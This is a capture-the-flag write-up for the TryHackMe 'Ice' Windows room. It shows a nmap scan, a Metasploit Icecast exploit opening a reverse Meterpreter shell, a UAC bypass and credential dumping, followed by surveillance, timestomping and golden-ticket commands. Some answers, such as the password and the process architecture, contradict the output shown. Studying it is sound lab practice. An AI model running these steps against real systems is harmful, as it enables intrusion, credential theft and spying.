This is a write up for the room Ice on the CTF platform TryHackMe. Ice is a windows machine with a notable vulnerablity in its secured media server.
Tools Used:
- Nmap
- Metasploit
Task 1 Connect
Browse to your openvpn file and use the following command
sudo openvpn youfilehere.ovpn
Task 2 Recon
After machine is deployed takes up to 3 minutes we will perform a syn scan using nmap. Syn scans use the flag -sS
┌──(hhhharshil㉿kali)-[~]
└─$ sudo nmap -T5 -sV -sS 10.10.142.23
[sudo] password for hhhharshil:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 11:25 EDT
Nmap scan report for 10.10.142.23
Host is up (0.086s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
5357/tcp open wsdapi?
8000/tcp open http Icecast streaming media server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.63 seconds
Q: Once the scan completes, we’ll see a number of interesting ports open on this machine. As you might have guessed, the firewall has been disabled (with the service completely shutdown), leaving very little to protect this machine. One of the more interesting ports that is open is Microsoft Remote Desktop (MSRDP). What port is this open on?
A: As shown in the Nmap Scan Above Port 3389 is open aka RDP.
Q: What service did nmap identify as running on port 8000? (First word of this service)
A: Icecast (see scan above)
Q: What does Nmap identify as the hostname of the machine? (All caps for the answer)
A: DARK-PC (see scan above)
Task 3 Gain Access
Q: Now that we’ve identified some interesting services running on our target machine, let’s do a little bit of research into one of the weirder services identified: Icecast. Icecast, or well at least this version running on our target, is heavily flawed and has a high level vulnerability with a score of 7.5 (7.4 depending on where you view it). What type of vulnerability is it? Use https://www.cvedetails.com for this question and the next.
ADD IMAGE HERE
Q: After Metasploit has started, let’s search for our target exploit using the command ‘search icecast’. What is the full path (starting with exploit) for the exploitation module? This module is also referenced in ‘RP: Metasploit’ which is recommended to be completed prior to this room, although not entirely necessary.
A: exploit/windows/http/icecast_header
msf6 > search icecast
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header
Q: Following selecting our module, we now have to check what options we have to set. Run the command show options. What is the only required setting which currently is blank?
A: RHOSTS
msf6 exploit(windows/http/icecast_header) > show options
Module options (exploit/windows/http/icecast_header):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8000 yes The target port (TCP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.21 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
First let’s check that the LHOST option is set to our tun0 IP (which can be found on the access page). With that done, let’s set that last option to our target IP. Now that we have everything ready to go, let’s run our exploit using the command exploit
msf6 exploit(windows/http/icecast_header) > set lhost 10.6.46.243
lhost => 10.6.46.243
msf6 exploit(windows/http/icecast_header) > set rhosts 10.10.142.23
rhosts => 10.10.142.23
msf6 exploit(windows/http/icecast_header) > exploit
[*] Started reverse TCP handler on 10.6.46.243:4444
[*] Sending stage (175174 bytes) to 10.10.142.23
[*] Meterpreter session 1 opened (10.6.46.243:4444 -> 10.10.142.23:49212) at 2021-05-24 11:39:49 -0400
meterpreter >
Task 4 Escalate
Q: What is the name of the shell we have?
A: meterpreter
Q: What user was running that Icecast process? The commands used in this question and the next few are taken directly from the ‘RP: Metasploit’ room.
A: Dark
meterpreter > getuid
Server username: Dark-PC\Dark
Q: What build of Windows is the system?
A: 7601
meterpreter > sysinfo
Computer : DARK-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
Q: Now that we know some of the finer details of the system we are working with, let’s start escalating our privileges. First, what is the architecture of the process we’re running?
A: x64
Q: Now that we know the architecture of the process, let’s perform some further recon. While this doesn’t work the best on x64 machines, let’s now run the following command run post/multi/recon/local_exploit_suggester. This can appear to hang as it tests exploits and might take several minutes to complete
A:
[*] 10.10.142.23 - Collecting local exploits for x86/windows...
[*] 10.10.142.23 - 37 exploit checks are being tried...
[+] 10.10.142.23 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.142.23 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.10.142.23 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.142.23 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.142.23 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.142.23 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.142.23 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.142.23 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.142.23 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
Q: Running the local exploit suggester will return quite a few results for potential escalation exploits. What is the full path (starting with exploit/) for the first returned exploit?
A: exploit/windows/local/bypassuac_eventvwr This was grabbed from running local exploit suggester via metasploit.
Q: Now that we’ve set our session number, further options will be revealed in the options menu. We’ll have to set one more as our listener IP isn’t correct. What is the name of this option?
A: Listener IP is what the LHOST is refferred to. Use “show options” for further clarification.
Q: We can now verify that we have expanded permissions using the command getprivs. What permission listed allows us to take ownership of files?
A: SeTakeOwnershipPrivilege
msf6 exploit(windows/local/bypassuac_eventvwr) > set session 6
session => 6
msf6 exploit(windows/local/bypassuac_eventvwr) > exploit
[*] Started reverse TCP handler on 10.6.46.243:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[*] Sending stage (175174 bytes) to 10.10.18.154
[*] Meterpreter session 7 opened (10.6.46.243:4444 -> 10.10.18.154:49184) at 2021-05-24 12:54:10 -0400
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175174 bytes) to 10.10.18.154
[*] Meterpreter session 8 opened (10.6.46.243:4444 -> 10.10.18.154:49191) at 2021-05-24 12:54:17 -0400
[*] Cleaning up registry keys ...
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
Task 5 Looting
Q: In order to interact with lsass we need to be ‘living in’ a process that is the same architecture as the lsass service (x64 in the case of this machine) and a process that has the same permissions as lsass. The printer spool service happens to meet our needs perfectly for this and it’ll restart if we crash it! What’s the name of the printer service?
Mentioned within this question is the term ‘living in’ a process. Often when we take over a running program we ultimately load another shared library into the program (a dll) which includes our malicious code. From this, we can spawn a new thread that hosts our shell.
A: spoolsv.exe
Q: Let’s check what user we are now with the command getuid. What user is listed?
A: NT AUTHORITY\SYSTEM
meterpreter > migrate -N spoolsv.exe
[*] Migrating from 1120 to 1368...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Q: Which command allows up to retrieve all credentials?
A: creds all
Q: Run this command now. What is Dark’s password? Mimikatz allows us to steal this password out of memory even without the user ‘Dark’ logged in as there is a scheduled task that runs the Icecast as the user ‘Dark’. It also helps that Windows Defender isn’t running on the box ;) (Take a look again at the ps list, this box isn’t in the best shape with both the firewall and defender disabled)
A: Password01
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Dark Dark-PC e52cac67419a9a22ecb08369099ed302 7c4fe5eada682714a036e39378362bab 0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
DARK-PC$ WORKGROUP (null)
Dark Dark-PC Password01!
tspkg credentials
=================
Username Domain Password
-------- ------ --------
Dark Dark-PC Password01!
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Dark Dark-PC Password01!
dark-pc$ WORKGROUP (null)
Task 6 Post Exploitation
Q: What command allows us to dump all of the password hashes stored on the system? We won’t crack the Administrative password in this case as it’s pretty strong (this is intentional to avoid password spraying attempts)
A: Hash Dump
Q: While more useful when interacting with a machine being used, what command allows us to watch the remote user’s desktop in real time?
A: Screenshare
Q: How about if we wanted to record from a microphone attached to the system?
A: record_mic
Q: To complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this? Don’t ever do this on a pentest unless you’re explicitly allowed to do so! This is not beneficial to the defending team as they try to breakdown the events of the pentest after the fact.
A: timestomp
Q:Mimikatz allows us to create what’s called a golden ticket, allowing us to authenticate anywhere with ease. What command allows us to do this?
Golden ticket attacks are a function within Mimikatz which abuses a component to Kerberos (the authentication system in Windows domains), the ticket-granting ticket. In short, golden ticket attacks allow us to maintain persistence and authenticate as any user on the domain.
A: golden_ticket_create